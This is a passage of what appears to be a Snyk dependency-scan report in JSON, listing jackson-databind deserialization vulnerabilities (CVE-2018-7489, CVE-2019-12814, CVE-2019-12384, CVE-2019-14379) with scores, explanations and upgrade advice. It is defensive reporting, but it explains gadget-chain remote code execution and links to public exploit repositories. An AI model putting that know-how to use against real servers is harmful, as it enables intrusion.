"com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.8.11" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, 
+ "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": 
"Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:15.371549Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.077144Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", + "epssDetails": { + "percentile": "0.87218", + "probability": "0.01539", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12814" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cmfg-87vq-g5g4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-19T15:28:46.421239Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-06-19T14:34:16Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-19T14:34:16Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.077144Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "College of software Nankai University" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", + "title": "Debian Security Announcement" + }, + { + "url": "https://github.com/jas502n/CVE-2019-12384", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "title": "Github Fix" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2334", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Jackson CVEs Don't Panic - Blog" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", + "title": "Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + 
"maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": 
"GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": 
